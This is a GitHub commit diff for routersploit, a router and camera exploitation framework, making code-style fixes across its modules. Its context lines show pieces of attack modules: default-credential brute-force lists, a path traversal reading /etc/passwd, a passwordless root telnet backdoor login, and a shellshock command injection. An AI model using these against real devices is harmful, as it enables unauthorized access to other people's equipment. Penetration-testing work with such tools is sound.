Skip to content

R
routersploit
Unverified Commit 62b83fb4 by Marcin Bury Committed by GitHub
Options

Improving code quality (#435)

parent 2ee21d01
Showing with 241 additions and 235 deletions
routersploit/core/bluetooth/btle/__init__.py
......@@ -5,3 +5,10 @@ from .btle_scanner import (
BTLEScanner,
ScanDelegate
)
__all__ = [
"Device",
"BTLEScanner",
"ScanDelegate",
]
routersploit/core/bluetooth/btle/btle_device.py
......@@ -120,7 +120,7 @@ class Device(ScanEntry):
for _, c in enumerate(service.getCharacteristics()):
if str(c.uuid) == characteristic:
char =c
char = c
break
if char:
......@@ -221,7 +221,7 @@ class Device(ScanEntry):
try:
string = color_blue(repr(data.decode("utf-8")))
except Exception:
stirng = repr(data)
string = repr(data)
except Exception:
pass
......
routersploit/core/bluetooth/btle/btle_scanner.py
......@@ -13,7 +13,7 @@ class BTLEScanner(Scanner):
def _decode_address(self, resp):
addr = binascii.b2a_hex(resp["addr"][0]).decode("utf-8")
return ":".join([addr[i : i + 2] for i in range(0, 12, 2)])
return ":".join([addr[i: i + 2] for i in range(0, 12, 2)])
def _find_or_create(self, addr):
if addr in self.scanned:
......@@ -59,6 +59,7 @@ class BTLEScanner(Scanner):
if self.mac and dev.addr == self.mac:
break
class ScanDelegate(DefaultDelegate):
def __init__(self, options):
DefaultDelegate.__init__(self)
......
routersploit/core/exploit/__init__.py
......@@ -24,5 +24,28 @@ from routersploit.core.exploit.printer import (
print_table,
)
import routersploit.core.exploit.utils
from routersploit.core.exploit import utils
from routersploit.core.exploit.shell import shell
__all__ = [
"Exploit",
"multi",
"mute",
"LockedIterator",
"OptIP",
"OptPort",
"OptInteger",
"OptFloat",
"OptBool",
"OptString",
"OptMAC",
"OptWordlist",
"print_info",
"print_status",
"print_success",
"print_error",
"print_table",
"utils",
"shell",
]
routersploit/core/exploit/exploit.py
import os
import threading
import time
import concurrent.futures
from future.utils import with_metaclass, iteritems
from itertools import chain
from functools import wraps
from routersploit.core.exploit.printer import (
print_status,
print_error,
thread_output_stream,
)
from routersploit.core.exploit.option import Option
......@@ -66,7 +64,6 @@ class Exploit(BaseExploit):
target_protocol = "custom"
def run(self):
raise NotImplementedError("You have to define your own 'run' method.")
......@@ -131,7 +128,7 @@ def multi(fn):
for target in file_handler:
target = target.strip()
if not target:
continue
continue
self.target, _, port = target.partition(":")
if port:
......@@ -204,5 +201,3 @@ class Protocol:
HTTP = "http"
HTTPS = "https"
SNMP = "snmp"
routersploit/core/exploit/option.py
......@@ -21,7 +21,7 @@ class Option(object):
def __get__(self, instance, owner):
return self.value
def __set__(self, instance, value):
if self._apply_widget(value):
self.display_value = value
......@@ -57,7 +57,7 @@ class OptPort(Option):
def __get__(self, instance, owner):
return int(self.value)
class OptBool(Option):
""" Option Bool attribute """
......
routersploit/core/exploit/utils.py
......@@ -16,7 +16,7 @@ WORDLISTS_DIR = wordlists.__path__[0]
def random_text(length, alph=string.ascii_letters + string.digits):
return ''.join(random.choice(alph) for _ in range(length))
return ''.join(random.choice(alph) for _ in range(length))
def is_ipv4(address):
......@@ -58,7 +58,7 @@ def convert_port(port):
def index_modules(modules_directory=MODULES_DIR):
""" Returns list of all exploits modules """
modules = []
for root, dirs, files in os.walk(modules_directory):
_, package, root = root.rpartition("routersploit/modules/".replace("/", os.sep))
......@@ -180,7 +180,7 @@ def lookup_vendor(addr):
if line == "" or line[0] == "#":
continue
mac, name = line.split(" ", 1)
mac, name = line.split(" ", 1)
if addr.startswith(mac):
return name
......@@ -249,7 +249,7 @@ class Version(object):
i += 1
return 0
return 0
def detect_file_content(content, f="/etc/passwd"):
......
routersploit/core/ftp/ftp_client.py
......@@ -55,7 +55,7 @@ class FTPClient(Exploit):
ftp_client.close()
return None
def ftp_test_connect(self):
ftp_client = self.ftp_connect()
if ftp_client:
......
routersploit/core/http/http_client.py
......@@ -21,7 +21,6 @@ class HTTPClient(Exploit):
verbosity = OptBool("true", "Verbosity enabled: true/false")
ssl = OptBool("false", "SSL enabled: true/false")
def http_request(self, method, path, session=requests, **kwargs):
if self.ssl:
url = "https://"
......
routersploit/core/snmp/snmp_client.py
......@@ -13,7 +13,7 @@ SNMP_TIMEOUT = 15.0
class SNMPClient(Exploit):
""" SNMP Client exploit """
target_protocol = Protocol.SNMP
target_protocol = Protocol.SNMP
verbosity = OptBool("true", "Enable verbose output: true/false")
......
routersploit/core/ssh/ssh_client.py
......@@ -4,7 +4,7 @@ import os
import select
import sys
import threading
import io
import io
from routersploit.core.exploit.exploit import Exploit
from routersploit.core.exploit.exploit import Protocol
......@@ -47,7 +47,7 @@ class SSHClient(Exploit):
return ssh_client
ssh_client.close()
return
def ssh_login_pkey(self, username, priv_key, retries=1):
......@@ -126,7 +126,7 @@ class SSHClient(Exploit):
self._posix_shell(chan)
else:
self._windows_shell(chan)
def _posix_shell(self, chan):
import termios
import tty
......@@ -156,7 +156,7 @@ class SSHClient(Exploit):
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin,termios.TCSADRAIN, oldtty)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
return
def _windows_shell(self, chan):
......
routersploit/core/tcp/tcp_client.py
......@@ -14,7 +14,7 @@ TCP_SOCKET_TIMEOUT = 8.0
class TCPClient(Exploit):
""" TCP Client exploit """
target_protocol = Protocol.TCP
target_protocol = Protocol.TCP
def tcp_create(self):
if is_ipv4(self.target):
......
routersploit/core/telnet/telnet_client.py
......@@ -13,7 +13,7 @@ TELNET_TIMEOUT = 30.0
class TelnetClient(Exploit):
""" Telnet Client exploit """
target_protocol = Protocol.TELNET
target_protocol = Protocol.TELNET
verbosity = OptBool("true", "Enable verbose output: true/false")
......@@ -79,11 +79,11 @@ class TelnetClient(Exploit):
def telnet_read_until(self, telnet_client, data):
if telnet_client:
if type(data) is str:
data = bytes(data, "utf-8")
data = bytes(data, "utf-8")
response = telnet_client.read_until(data, 5)
return str(response, "utf-8")
return None
def telnet_write(self, telnet_client, data):
......
routersploit/core/udp/udp_client.py
......@@ -13,7 +13,7 @@ UDP_SOCKET_TIMEOUT = 8.0
class UDPClient(Exploit):
""" UDP Client exploit """
target_protocol = Protocol.UDP
target_protocol = Protocol.UDP
def udp_create(self):
if is_ipv4(self.target):
......
routersploit/interpreter.py
......@@ -66,7 +66,7 @@ class BaseInterpreter(object):
atexit.register(readline.write_history_file, self.history_file)
readline.parse_and_bind("set enable-keypad on")
readline.set_completer(self.complete)
readline.set_completer_delims(" \t\n;")
if is_libedit():
......@@ -333,7 +333,7 @@ class RoutersploitInterpreter(BaseInterpreter):
except KeyboardInterrupt:
print_info()
print_error("Operation cancelled by user")
except:
except Exception:
print_error(traceback.format_exc(sys.exc_info()))
def command_exploit(self, *args, **kwargs):
......
routersploit/libs/apiros/apiros_client.py
import sys
import time
import binascii
import hashlib
class ApiRosClient(object):
"Routeros api"
"RouterOS API"
def __init__(self, sk):
self.sk = sk
self.currenttag = 0
def login(self, username, pwd):
for repl, attrs in self.talk(["/login"]):
chal = binascii.unhexlify((attrs['=ret']).encode('UTF-8'))
......@@ -17,16 +17,21 @@ class ApiRosClient(object):
md.update(b'\x00')
md.update(pwd.encode('UTF-8'))
md.update(chal)
output = self.talk(["/login", "=name=" + username,
"=response=00" + binascii.hexlify(md.digest()).decode('UTF-8') ])
output = self.talk([
"/login",
"=name=" + username,
"=response=00" + binascii.hexlify(md.digest()).decode('UTF-8')
])
return output
def talk(self, words):
if self.writeSentence(words) == 0: return
if self.writeSentence(words) == 0:
return
r = []
while 1:
i = self.readSentence();
if len(i) == 0: continue
i = self.readSentence()
if len(i) == 0:
continue
reply = i[0]
attrs = {}
for w in i[1:]:
......@@ -34,9 +39,10 @@ class ApiRosClient(object):
if (j == -1):
attrs[w] = ''
else:
attrs[w[:j]] = w[j+1:]
attrs[w[: j]] = w[j + 1:]
r.append((reply, attrs))
if reply == '!done': return r
if reply == '!done':
return r
def writeSentence(self, words):
ret = 0
......@@ -50,9 +56,10 @@ class ApiRosClient(object):
r = []
while 1:
w = self.readWord()
if w == '': return r
if w == '':
return r
r.append(w)
def writeWord(self, w):
self.writeLen(len(w))
self.writeStr(w)
......@@ -61,83 +68,85 @@ class ApiRosClient(object):
ret = self.readStr(self.readLen())
return ret
def writeLen(self, l):
if l < 0x80:
self.writeByte((l).to_bytes(1, sys.byteorder))
elif l < 0x4000:
l |= 0x8000
tmp = (l >> 8) & 0xFF
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
elif l < 0x200000:
l |= 0xC00000
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
elif l < 0x10000000:
l |= 0xE0000000
self.writeByte(((l >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
else:
def writeLen(self, length):
if length < 0x80:
self.writeByte((length).to_bytes(1, sys.byteorder))
elif length < 0x4000:
length |= 0x8000
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
elif length < 0x200000:
length |= 0xC00000
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
elif length < 0x10000000:
length |= 0xE0000000
self.writeByte(((length >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
else:
self.writeByte((0xF0).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
def readLen(self):
c = ord(self.readStr(1))
if (c & 0x80) == 0x00:
pass
elif (c & 0xC0) == 0x80:
c &= ~0xC0
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xE0) == 0xC0:
c &= ~0xE0
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xF0) == 0xE0:
c &= ~0xF0
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xF8) == 0xF0:
c = ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
return c
def readLen(self):
c = ord(self.readStr(1))
if (c & 0x80) == 0x00:
pass
elif (c & 0xC0) == 0x80:
c &= ~0xC0
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xE0) == 0xC0:
c &= ~0xE0
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xF0) == 0xE0:
c &= ~0xF0
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
elif (c & 0xF8) == 0xF0:
c = ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
c <<= 8
c += ord(self.readStr(1))
return c
def writeStr(self, str):
n = 0;
def writeStr(self, str):
n = 0
while n < len(str):
r = self.sk.send(bytes(str[n:], 'UTF-8'))
if r == 0: raise RuntimeError("connection closed by remote end")
n += r
if r == 0:
raise RuntimeError("connection closed by remote end")
n += r
def writeByte(self, str):
n = 0;
def writeByte(self, str):
n = 0
while n < len(str):
r = self.sk.send(str[n:])
if r == 0: raise RuntimeError("connection closed by remote end")
n += r
if r == 0:
raise RuntimeError("connection closed by remote end")
n += r
def readStr(self, length):
def readStr(self, length):
ret = ''
while len(ret) < length:
s = self.sk.recv(length - len(ret))
if s == '': raise RuntimeError("connection closed by remote end")
if s == '':
raise RuntimeError("connection closed by remote end")
ret += s.decode('UTF-8', 'replace')
return ret
routersploit/libs/lzs/lzs.py
......@@ -20,7 +20,6 @@
#
##############################################################
import sys
import collections
......
routersploit/modules/creds/cameras/basler/ssh_default_creds.py
......@@ -2,7 +2,7 @@ from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
class Exploit(SSHDefault):
__info__ = {
"name": "Basler Camera Default SSH Creds",
"description": "Module performs dictionary attack against Basler Camera SSH service. "
......
routersploit/modules/creds/cameras/canon/ssh_default_creds.py
......@@ -6,7 +6,7 @@ class Exploit(SSHDefault):
__info__ = {
"name": "Canon Camera Default SSH Creds",
"description": "Module performs dictionary attack against Canon Camera SSH service. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/cameras/canon/webinterface_http_auth_default_creds.py
......@@ -6,7 +6,7 @@ class Exploit(HTTPBasicDigestDefault):
__info__ = {
"name": "Canon Camera Default Web Interface Creds - HTTP Auth",
"description": "Module performs dictionary attack against Canon Camera Web Interface. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/cameras/cisco/ftp_default_creds.py
......@@ -19,5 +19,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/dlink/ssh_default_creds.py
......@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/geovision/ftp_default_creds.py
......@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/mobotix/ftp_default_creds.py
......@@ -6,7 +6,7 @@ class Exploit(FTPDefault):
__info__ = {
"name": "Mobotix Camera Default FTP Creds",
"description": "Module performs dictionary attack against Mobotix Camera FTP service. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/cameras/mobotix/ssh_default_creds.py
......@@ -6,7 +6,7 @@ class Exploit(SSHDefault):
__info__ = {
"name": "Mobotix Camera Default SSH Creds",
"description": "Module performs dictionary attack against Mobotix Camera SSH service. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/cameras/siemens/ssh_default_creds.py
......@@ -18,5 +18,5 @@ class Exploit(SSHDefault):
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(22, "Target SSH port")
threads = OptInteger(1, "Number of threads")
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/speco/ssh_default_creds.py
......@@ -18,5 +18,5 @@ class Exploit(SSHDefault):
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(22, "Target SSH port")
threads = OptInteger(1, "Number of threads")
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:1234", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/vacron/ftp_default_creds.py
......@@ -6,7 +6,7 @@ class Exploit(FTPDefault):
__info__ = {
"name": "Vacron Camera Default FTP Creds",
"description": "Module performs dictionary attack against Vacron Camera FTP service. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/cameras/videoiq/ftp_default_creds.py
......@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("supervisor:supervisor", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/videoiq/ssh_default_creds.py
......@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads")
default = OptWordlist("supervistor:supervisor", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/generic/ftp_default.py
from routersploit.core.exploit import *
from routersploit.core.ftp.ftp_client import FTPClient
from routersploit.resources import wordlists
from routersploit.resources import wordlists
class Exploit(FTPClient):
......@@ -37,7 +37,7 @@ class Exploit(FTPClient):
print_status("Starting attack against FTP service")
data = LockedIterator(self.defaults)
self.run_threads(self.threads, self.target_function, data)
self.run_threads(self.threads, self.target_function, data)
if self.credentials:
print_success("Credentials found!")
......@@ -49,7 +49,7 @@ class Exploit(FTPClient):
def target_function(self, running, data):
while running.is_set():
try:
username, password = data.next().split(":")
username, password = data.next().split(":")
except StopIteration:
break
else:
......
routersploit/modules/creds/generic/http_basic_digest_bruteforce.py
import itertools
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
from routersploit.resources import wordlists
from routersploit.resources import wordlists
from requests.auth import HTTPDigestAuth
......
routersploit/modules/creds/generic/http_basic_digest_default.py
......@@ -57,7 +57,7 @@ class Exploit(HTTPClient):
while running.is_set():
try:
username, password = data.next().split(":")
if self.auth_type == "digest":
auth = HTTPDigestAuth(username, password)
else:
......
routersploit/modules/creds/generic/snmp_bruteforce.py
......@@ -58,7 +58,7 @@ class Exploit(SNMPClient):
except StopIteration:
break
def check(self):
raise NotImplementedError("Check method is not available")
......
routersploit/modules/creds/generic/ssh_default.py
......@@ -48,7 +48,7 @@ class Exploit(SSHClient):
print_error("Credentials not found")
def target_function(self, running, data):
while running.is_set():
while running.is_set():
try:
username, password = data.next().split(":")
ssh = self.ssh_login(username, password)
......
routersploit/modules/creds/generic/telnet_bruteforce.py
......@@ -37,7 +37,7 @@ class Exploit(TelnetClient):
if not self.check():
return
print_status("Starting bruteforce attack against Telnet service")
print_status("Starting bruteforce attack against Telnet service")
data = LockedIterator(itertools.product(self.usernames, self.passwords))
self.run_threads(self.threads, self.target_function, data)
......
routersploit/modules/creds/generic/telnet_default.py
......@@ -35,7 +35,7 @@ class Exploit(TelnetClient):
if not self.check():
return
print_status("Starting default credentials attack against Telnet service")
print_status("Starting default credentials attack against Telnet service")
data = LockedIterator(self.defaults)
self.run_threads(self.threads, self.target_function, data)
......
routersploit/modules/creds/routers/asmax/telnet_default_creds.py
......@@ -20,4 +20,3 @@ class Exploit(TelnetDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,support:support,user:user", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/routers/belkin/ftp_default_creds.py
......@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,admin:password", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/routers/fortinet/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/huawei/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/ipfire/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/ipfire/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......@@ -15,7 +15,6 @@ class Exploit(TelnetDefault):
),
}
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(23, "Target Telnet port")
......
routersploit/modules/creds/routers/juniper/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py
......@@ -7,7 +7,7 @@ class Exploit(TCPClient):
__info__ = {
"name": "Mikrotik Default Creds - API ROS",
"description": "",
"authors": (
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"devices": (
......@@ -64,7 +64,7 @@ class Exploit(TCPClient):
print_error("Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
tcp_client.close()
except StopIteration:
break
......
routersploit/modules/creds/routers/movistar/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/netcore/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/netcore/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/netgear/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/netgear/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/netsys/ftp_default_creds.py
......@@ -6,7 +6,7 @@ class Exploit(FTPDefault):
__info__ = {
"name": "Netsys Router Default FTP Creds",
"description": "Module performs dictionary attack against Netsys Router FTP service. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/routers/netsys/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
__info__ = {
"name": "Netsys Router Default SSH Creds",
"description": "Module performs dictionary attack against Netsys Router SSH service. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/routers/netsys/telnet_default_creds.py
......@@ -6,7 +6,7 @@ class Exploit(FTPDefault):
__info__ = {
"name": "Netsys Router Default Telnet Creds",
"description": "Module performs dictionary attack against Netsys Router Telnet service. "
"If valid credentials are found, they are displayed to the user.",
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
......
routersploit/modules/creds/routers/pfsense/webinterface_http_form_default_creds.py
import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
......@@ -48,7 +47,6 @@ class Exploit(HTTPClient):
def target_function(self, data):
username, password = data.split(":")
def check(self):
response = self.http_request(
method="GET",
......@@ -57,9 +55,7 @@ class Exploit(HTTPClient):
if response is None:
return False
if all([x in response.text
for x in ['<script type="text/javascript" src="/themes/pfsense_ng/javascript/niftyjsCode.js"></script>',
'var csrfMagicToken =']]):
if all([x in response.text for x in ['<script type="text/javascript" src="/themes/pfsense_ng/javascript/niftyjsCode.js"></script>', 'var csrfMagicToken =']]):
return True
return False
......
routersploit/modules/creds/routers/technicolor/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/technicolor/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/thomson/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/tplink/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/tplink/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/ubiquiti/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,root:ubnt,ubnt:ubnt", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/routers/ubiquiti/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/zte/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/zte/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/creds/routers/zyxel/ssh_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
......
routersploit/modules/creds/routers/zyxel/telnet_default_creds.py
from routersploit.core.exploit import *
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault
class Exploit(TelnetDefault):
......
routersploit/modules/exploits/cameras/dlink/dcs_930l_932l_auth_bypass.py
......@@ -26,10 +26,9 @@ class Exploit(HTTPClient):
port = OptPort(8080, "Target HTTP port")
def __init__(self):
config_content = None
self.config_content = None
def run(self):
if self.check():
print_success("Target appears to be vulnerable.")
......@@ -115,4 +114,3 @@ class Exploit(HTTPClient):
ret_str += tmp_str[i + half_str_len] + tmp_str[i]
return ret_str
routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor.py
......@@ -42,8 +42,7 @@ class Exploit(TelnetClient):
print_success("SQLI successful, going to telnet into port 20000 "
"with username root and no password to get shell")
tn = self.telnet_login("root", "", port=20000)
tn = self.telnet_login("root", "", port=20000)
if tn:
self.telnet_interactive(tn)
......
routersploit/modules/exploits/cameras/multi/P2P_wificam_credential_disclosure.py
import requests
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
......
routersploit/modules/exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal.py
......@@ -26,7 +26,7 @@ class Exploit(HTTPClient):
port = OptPort(80, "Target HTTP port")
filename = OptString("/etc/passwd", "File to read from the filesystem")
def __init__(self):
self.resources = (
"/cgi-bin/check.cgi?file=../../..{}",
......
routersploit/modules/exploits/cameras/multi/netwave_ip_camera_information_disclosure.py
......@@ -59,7 +59,7 @@ class Exploit(HTTPClient):
for chunk in response.iter_content(chunk_size=100):
if "admin" in chunk:
print_success(chunk)
except:
except Exception:
print_error("Exploit failed - could not read /proc/kcore")
@mute
......
routersploit/modules/exploits/generic/shellshock.py
......@@ -44,8 +44,6 @@ class Exploit(HTTPClient):
def execute(self, cmd):
marker = utils.random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
headers = {
